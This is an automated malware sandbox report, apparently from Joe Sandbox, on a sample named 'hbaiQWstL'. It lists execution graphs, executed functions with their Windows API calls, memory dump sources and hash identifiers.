                execution_graph 27855 af10040 27856 af101cb 27855->27856 27857 af10066 27855->27857 27857->27856 27860 af102c0 PostMessageW 27857->27860 27862 af102b8 27857->27862 27861 af1032c 27860->27861 27861->27857 27863 af102c0 PostMessageW 27862->27863 27864 af1032c 27863->27864 27864->27857 27777 185d540 27778 185d586 GetCurrentProcess 27777->27778 27780 185d5d1 27778->27780 27781 185d5d8 GetCurrentThread 27778->27781 27780->27781 27782 185d615 GetCurrentProcess 27781->27782 27783 185d60e 27781->27783 27784 185d64b 27782->27784 27783->27782 27785 185d673 GetCurrentThreadId 27784->27785 27786 185d6a4 27785->27786 27865 185b1b0 27866 185b1bf 27865->27866 27868 185b299 27865->27868 27869 185b2dc 27868->27869 27870 185b2b9 27868->27870 27869->27866 27870->27869 27871 185b4e0 GetModuleHandleW 27870->27871 27872 185b50d 27871->27872 27872->27866 27787 58e4688 27788 58e469f 27787->27788 27791 58e4178 27788->27791 27792 58e4183 27791->27792 27798 58e43e0 27792->27798 27794 58e4a42 27802 58e7027 27794->27802 27808 58e7038 27794->27808 27795 58e472a 27799 58e43eb 27798->27799 27800 58e4b84 27799->27800 27814 58e2ac0 GetSystemMetrics GetSystemMetrics 27799->27814 27800->27794 27803 58e7058 27802->27803 27804 58e70c7 27802->27804 27805 58e708c 27803->27805 27815 58e7138 27803->27815 27821 58e7148 27803->27821 27804->27795 27805->27795 27810 58e7058 27808->27810 27811 58e70c7 27808->27811 27809 58e708c 27809->27795 27810->27809 27812 58e7138 GetCurrentThreadId 27810->27812 27813 58e7148 GetCurrentThreadId 27810->27813 27811->27795 27812->27810 27813->27810 27814->27800 27816 58e7148 27815->27816 27820 58e716c 27816->27820 27828 58e584c 27816->27828 27819 58e584c GetCurrentThreadId 27819->27820 27820->27803 27822 58e716c 27821->27822 27823 58e7173 27821->27823 27822->27803 27824 58e584c GetCurrentThreadId 27823->27824 27827 58e719a 27823->27827 27825 58e7190 27824->27825 27826 58e584c GetCurrentThreadId 27825->27826 27826->27827 27827->27803 27829 58e5857 27828->27829 27830 58e74af GetCurrentThreadId 27829->27830 27831 58e7190 27829->27831 27830->27831 27831->27819 27832 185d788 DuplicateHandle 27833 185d81e 27832->27833 27834 1854668 27835 1854669 27834->27835 27836 1854686 27835->27836 27838 1854778 27835->27838 27839 185479d 27838->27839 27843 1854879 27839->27843 27847 1854888 27839->27847 27844 18548af 27843->27844 27845 185498c 27844->27845 27851 18544e0 27844->27851 27848 18548af 27847->27848 27849 18544e0 CreateActCtxA 27848->27849 27850 185498c 27848->27850 27849->27850 27852 1855918 CreateActCtxA 27851->27852 27854 18559db 27852->27854

                Executed Functions

                Function 0185D530 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetCurrentProcess.KERNEL32 ref: 0185D5BE
                • GetCurrentThread.KERNEL32 ref: 0185D5FB
                • GetCurrentProcess.KERNEL32 ref: 0185D638
                • GetCurrentThreadId.KERNEL32 ref: 0185D691
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: d298d3c493fdf751a91867940a9409122cc84f3f9c3e7ebc134d1101af76ff21
                • Instruction ID: a5e7a1d7e740e9590b9cf45ac9fbe39e8f408d71d9410664465b9e078de32e28
                • Opcode Fuzzy Hash: d298d3c493fdf751a91867940a9409122cc84f3f9c3e7ebc134d1101af76ff21
                • Instruction Fuzzy Hash: AB5188B09003498FDB54DFA9C548BDEBFF1FF88314F24845AE909AB2A0DB746944CB65
                Function 0185D540 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetCurrentProcess.KERNEL32 ref: 0185D5BE
                • GetCurrentThread.KERNEL32 ref: 0185D5FB
                • GetCurrentProcess.KERNEL32 ref: 0185D638
                • GetCurrentThreadId.KERNEL32 ref: 0185D691
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 89115e32bdefff963d99f4e7d91292b0cfed5d6cf2c5cc1614791928e56921eb
                • Instruction ID: d056e909a671e6c6fbc20a1009ffb18cb0068ac67a59dd1e10bde5468f186959
                • Opcode Fuzzy Hash: 89115e32bdefff963d99f4e7d91292b0cfed5d6cf2c5cc1614791928e56921eb
                • Instruction Fuzzy Hash: E25155B09003498FDB44DFA9C548B9EBFF1EF88314F208459E909A72A0DB74A945CB65
                Function 0185B299 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 44 185b299-185b2b7 45 185b2e3-185b2e7 44->45 46 185b2b9-185b2c6 call 185af38 44->46 48 185b2e9-185b2f3 45->48 49 185b2fb-185b33c 45->49 53 185b2dc 46->53 54 185b2c8 46->54 48->49 55 185b33e-185b346 49->55 56 185b349-185b357 49->56 53->45 99 185b2ce call 185b540 54->99 100 185b2ce call 185b532 54->100 55->56 57 185b359-185b35e 56->57 58 185b37b-185b37d 56->58 60 185b360-185b367 call 185af44 57->60 61 185b369 57->61 63 185b380-185b387 58->63 59 185b2d4-185b2d6 59->53 62 185b418-185b4d8 59->62 65 185b36b-185b379 60->65 61->65 94 185b4e0-185b50b GetModuleHandleW 62->94 95 185b4da-185b4dd 62->95 66 185b394-185b39b 63->66 67 185b389-185b391 63->67 65->63 68 185b39d-185b3a5 66->68 69 185b3a8-185b3b1 call 185af54 66->69 67->66 68->69 75 185b3b3-185b3bb 69->75 76 185b3be-185b3c3 69->76 75->76 77 185b3c5-185b3cc 76->77 78 185b3e1-185b3ee 76->78 77->78 80 185b3ce-185b3de call 185af64 call 185af74 77->80 84 185b411-185b417 78->84 85 185b3f0-185b40e 78->85 80->78 85->84 96 185b514-185b528 94->96 97 185b50d-185b513 94->97 95->94 97->96 99->59 100->59
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0185B4FE
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: fbaf42d54cd2e6252c024a667110a47adb7f04d5e483b60090eb13925be21084
                • Instruction ID: 048908d54dcd341777b2874136fa590be62c6e2875f96ef6367b5cab47a0a1a6
                • Opcode Fuzzy Hash: fbaf42d54cd2e6252c024a667110a47adb7f04d5e483b60090eb13925be21084
                • Instruction Fuzzy Hash: 59815770A00B058FE764DF29D48479ABBF2FF88304F108A2DD84ADBA51DB75E945CB91
                Function 018544E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 101 18544e0-18559d9 CreateActCtxA 104 18559e2-1855a3c 101->104 105 18559db-18559e1 101->105 112 1855a3e-1855a41 104->112 113 1855a4b-1855a4f 104->113 105->104 112->113 114 1855a51-1855a5d 113->114 115 1855a60 113->115 114->115 117 1855a61 115->117 117->117
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 018559C9
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 04db838b3d12f1a307dfa7577a80079e485bab7c5defd8ad8a22541841ff9d96
                • Instruction ID: 7e7aa0d6f68f004c94baafadf44256fa69bb19d43446e7a500efad97f60b452c
                • Opcode Fuzzy Hash: 04db838b3d12f1a307dfa7577a80079e485bab7c5defd8ad8a22541841ff9d96
                • Instruction Fuzzy Hash: 4241E070C0071DCBDB24DFA9C884B8EBBB5FF88704F20806AD408AB251DB756A49CF90
                Function 0185590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 118 185590c-18559d9 CreateActCtxA 120 18559e2-1855a3c 118->120 121 18559db-18559e1 118->121 128 1855a3e-1855a41 120->128 129 1855a4b-1855a4f 120->129 121->120 128->129 130 1855a51-1855a5d 129->130 131 1855a60 129->131 130->131 133 1855a61 131->133 133->133
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 018559C9
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 5bb5388cfd78bca7b6dd23a624f8ee1119bbb6ffad4cd3c738e5cde53b795fd7
                • Instruction ID: b9559251580e02999128aecd9868d63431892718b0eeea6f8efc430ddb92eacf
                • Opcode Fuzzy Hash: 5bb5388cfd78bca7b6dd23a624f8ee1119bbb6ffad4cd3c738e5cde53b795fd7
                • Instruction Fuzzy Hash: A641CF70C00719CFDB25DFA9C984BDEBBB2BF88714F20816AD418AB251DB75694ACF50
                Function 0185D788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 134 185d788-185d81c DuplicateHandle 135 185d825-185d842 134->135 136 185d81e-185d824 134->136 136->135
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0185D80F
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 04afeb18131d7ac03ca0bbaa2bb7a3c4bb93c55fabd5add42c499a53e90d9444
                • Instruction ID: 6c98b1b921ccdf3a1e530a7c57c5d9fcadd423eedad8914f5e4cbc0823b3d5ba
                • Opcode Fuzzy Hash: 04afeb18131d7ac03ca0bbaa2bb7a3c4bb93c55fabd5add42c499a53e90d9444
                • Instruction Fuzzy Hash: F121E4B5900249DFDB10CF9AD984ADEBFF4FB48324F14841AE918A3310D379A954CFA1
                Function 0185D780 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 139 185d780-185d81c DuplicateHandle 140 185d825-185d842 139->140 141 185d81e-185d824 139->141 141->140
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0185D80F
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: e4261cf0f354ed33adea1a260803c43c23bb47f3dfb11d6c1b37fe446827a846
                • Instruction ID: f1e4bc7e32da14e5ee925b978d16472aacde28392f284ec325a04fc177cf34f2
                • Opcode Fuzzy Hash: e4261cf0f354ed33adea1a260803c43c23bb47f3dfb11d6c1b37fe446827a846
                • Instruction Fuzzy Hash: 03210EB5C00248DFDB10CFA9D984ADEBBF4FB08324F14841AE918A3250D378AA54CF61
                Function 0AF102B8 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 144 af102b8-af1032a PostMessageW 146 af10333-af10347 144->146 147 af1032c-af10332 144->147 147->146
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 0AF1031D
                Memory Dump Source
                • Source File: 0000000A.00000002.2334366563.000000000AF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_af10000_hbaiQWstL.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 5709f3c777872924a6c163686151df203ceb2cc461be369e7172b10ec7dfa233
                • Instruction ID: 4df73d441b10d22a3cacd25b2fddc78938b40d4b1f950493a646039dc1d8ee42
                • Opcode Fuzzy Hash: 5709f3c777872924a6c163686151df203ceb2cc461be369e7172b10ec7dfa233
                • Instruction Fuzzy Hash: B21128B58003499FDB10DF9AD584BDEFFF8EB48324F14841AD559A7600C775A584CFA1
                Function 0185B498 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 149 185b498-185b4d8 150 185b4e0-185b50b GetModuleHandleW 149->150 151 185b4da-185b4dd 149->151 152 185b514-185b528 150->152 153 185b50d-185b513 150->153 151->150 153->152
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0185B4FE
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 2cc6d197391f22def3a91eade8b35c8c7c03c9dba3c7903668fe4d19c7a4b376
                • Instruction ID: a9795facf16ded9f1a283931b2d4e84ccfa848fddf35accc76186f7696f63340
                • Opcode Fuzzy Hash: 2cc6d197391f22def3a91eade8b35c8c7c03c9dba3c7903668fe4d19c7a4b376
                • Instruction Fuzzy Hash: 9B11D2B5C006498FDB14CF9AC444A9EFBF5EB88328F14841AD919A7610D379A645CFA1
                Function 0AF102C0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 155 af102c0-af1032a PostMessageW 156 af10333-af10347 155->156 157 af1032c-af10332 155->157 157->156
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 0AF1031D
                Memory Dump Source
                • Source File: 0000000A.00000002.2334366563.000000000AF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_af10000_hbaiQWstL.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 2aa5d1ffeecc9f41758d24c07e61e738521921f2d713d540a6dda331286521f6
                • Instruction ID: 290097e613273584067b109d4f3c552f77f9a17235b21bd29c0034481c9e2764
                • Opcode Fuzzy Hash: 2aa5d1ffeecc9f41758d24c07e61e738521921f2d713d540a6dda331286521f6
                • Instruction Fuzzy Hash: FA1103B58003499FDB10DF9AC884BDEBBF8EB48324F10841AD519A7600C379A544CFA1
                Function 017BD3D8 Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2277242611.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17bd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 24d5b7b7a5efd22c716741d8babd4e91f41d2226b9d8c291cb31eaeddccd29b9
                • Instruction ID: 9856264f62477b26e820410fa0c01db522e24f458ac11f08bc0406a0954faa6b
                • Opcode Fuzzy Hash: 24d5b7b7a5efd22c716741d8babd4e91f41d2226b9d8c291cb31eaeddccd29b9
                • Instruction Fuzzy Hash: E52148B2100204DFDB25DF84D9C0BA6FF65FB84328F20C5ACED090B256C33AE456CAA1
                Function 017BD4C4 Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2277242611.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17bd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: acc5fdfaa5821fd95cfee14628bbcfcb14abd3f2ad94b5dee931556ec78306ef
                • Instruction ID: 941890491872b4f212350f3bfd0edb11154dbe2daa9c684edd15180b4809b409
                • Opcode Fuzzy Hash: acc5fdfaa5821fd95cfee14628bbcfcb14abd3f2ad94b5dee931556ec78306ef
                • Instruction Fuzzy Hash: FE21F1B2504244EFDB25DF54D9C0B66FF65FB8831CF3085A9E9090A256C33AD456CAA1
                Function 017CD01C Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2285648267.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17cd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 18e0af3eb7c27f067ddbf116fe83d0afe7ce132bcd5b88a392745f2cf4619d2c
                • Instruction ID: 8dc14ece6d7554e193acd64ff23e2e42d3647465bc60f10671f24bf15a1bb323
                • Opcode Fuzzy Hash: 18e0af3eb7c27f067ddbf116fe83d0afe7ce132bcd5b88a392745f2cf4619d2c
                • Instruction Fuzzy Hash: BA212275604204EFDB25DF58D9C0B26FBA1FB88B14F20C5BDD90A0B252C37AD487CAA1
                Function 017CD1D4 Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2285648267.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17cd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6ec78083eeea796dd5fc7b9a3529e9f57a99323bcd48f678c0451a1dd5c492c2
                • Instruction ID: f323d0ca8d006d9412de274c84498559b05e202898a6ff9e77b7500cfdd34c40
                • Opcode Fuzzy Hash: 6ec78083eeea796dd5fc7b9a3529e9f57a99323bcd48f678c0451a1dd5c492c2
                • Instruction Fuzzy Hash: B62137B1508200EFDB25DF94D9C0B26FB62FB84B24F20C5BDD9094B252C376D406CBA1
                Function 017BD4BF Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2277242611.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17bd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                • Instruction ID: 0adfeaa3251f90d2f8fd2aff007a5465033a7f400ca16ab5fd753b531799b221
                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                • Instruction Fuzzy Hash: 5511DF76404280CFCB12CF54D5C4B56FF72FB84318F24C6A9D8090B256C33AD456CBA1
                Function 017BD3D3 Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2277242611.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17bd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                • Instruction ID: 27f078660c908bcc5e273c427aace3e683adb63af1659a9644de68971e1a0535
                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                • Instruction Fuzzy Hash: AF11C076404240CFCB12CF44D5C4B96BF61FB84314F2486A9DC090A256C33AD456CB91
                Function 017CD1CF Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2285648267.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17cd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction ID: 463d14b884c9b013ee1016cbdeead717b604c64acff230740495fde6e115d0b8
                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction Fuzzy Hash: 3D11BE76508280DFCB12CF54C5C0B15FB62FB84724F24C6ADD8494B256C33AD40ACB91
                Function 017CD017 Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.2285648267.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17cd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction ID: 2a67b1dd5a875b21360f959052db8bac78ae9ed31618f979ddc333db749a4ad7
                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction Fuzzy Hash: 8B11DD75504284DFCB22CF58D5C4B15FFA2FB88714F24C6AED8494B656C33AD44ACBA2

                Execution Graph

                Execution Coverage:0.1%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:5
                Total number of Limit Nodes:1
                execution_graph 63439 17f2df0 LdrInitializeThunk 63441 17f2c00 63443 17f2c0a 63441->63443 63444 17f2c1f LdrInitializeThunk 63443->63444 63445 17f2c11 63443->63445

                Executed Functions

                Function 017F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 17f2c0a-17f2c0f 1 17f2c1f-17f2c26 LdrInitializeThunk 0->1 2 17f2c11-17f2c18 0->2
                APIs
                • LdrInitializeThunk.NTDLL(0180FD4F,000000FF,00000024,018A6634,00000004,00000000,?,-00000018,7D810F61,?,?,017C8B12,?,?,?,?), ref: 017F2C24
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: bf9341db8686d92d3190550deda9752700a505a7d4c9843f1b856b5a91ab81f4
                • Instruction ID: 6fc36a2bfa57b6d0c87fb2fe631eb7fce62fe651ea548c9865e3a5ef89b8066a
                • Opcode Fuzzy Hash: bf9341db8686d92d3190550deda9752700a505a7d4c9843f1b856b5a91ab81f4
                • Instruction Fuzzy Hash: EEB09B71D019C5C9DB52E7644A087177900B7D1711F15C065D3034695F8738C1D5E276
                Function 017F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 4 17f2df0-17f2dfc LdrInitializeThunk
                APIs
                • LdrInitializeThunk.NTDLL(0182E73E,0000005A,0188D040,00000020,00000000,0188D040,00000080,01814A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,017FAE00), ref: 017F2DFA
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: d46f43e03a073fb2ee82efc7326a08d2d686db0013c2351aa62c840a252b3103
                • Instruction ID: 1dea0d6e83d09e767c2ca66a0fb2ec03541f0e37fd4a3220214cd6349363efb7
                • Opcode Fuzzy Hash: d46f43e03a073fb2ee82efc7326a08d2d686db0013c2351aa62c840a252b3103
                • Instruction Fuzzy Hash: 8290023160180857D15271584904707000997D1341F95C412A142859CDD6568BD6A222
                Function 017F35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5 17f35c0-17f35cc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: a3fa59dd017ac628186501af29686a076fbdcb0d4130c5ece3e87d5c01fc5d26
                • Instruction ID: 751d752ae877c753cd6593c60e76bd20503a963e39bb696491df726c41a16d66
                • Opcode Fuzzy Hash: a3fa59dd017ac628186501af29686a076fbdcb0d4130c5ece3e87d5c01fc5d26
                • Instruction Fuzzy Hash: EC900231A0590846D14171584914706100597D1301F65C411A14285ACDC7958BD566A3
                Function 0042D000 Relevance: .1, Instructions: 59COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 6 42d000-42d01a 8 42d025-42d040 6->8 9 42d01c-42d024 6->9 8->9 11 42d042-42d08a call 42e683 call 42e633 8->11 16 42d08f-42d09d 11->16
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 38d3599b24e04c04455723bad7906fc3437ea9deb6112700fda80e06c56e1c08
                • Instruction ID: e1bad01d78eea3593c0e48f5639def0373a07c299f4d63162d710884237cd9e6
                • Opcode Fuzzy Hash: 38d3599b24e04c04455723bad7906fc3437ea9deb6112700fda80e06c56e1c08
                • Instruction Fuzzy Hash: 90110672B406156BD324DF55DC82FFBB379DF84314F54054EFA088A181EA74AA4287D8
                Function 0042E1E0 Relevance: .0, Instructions: 47COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
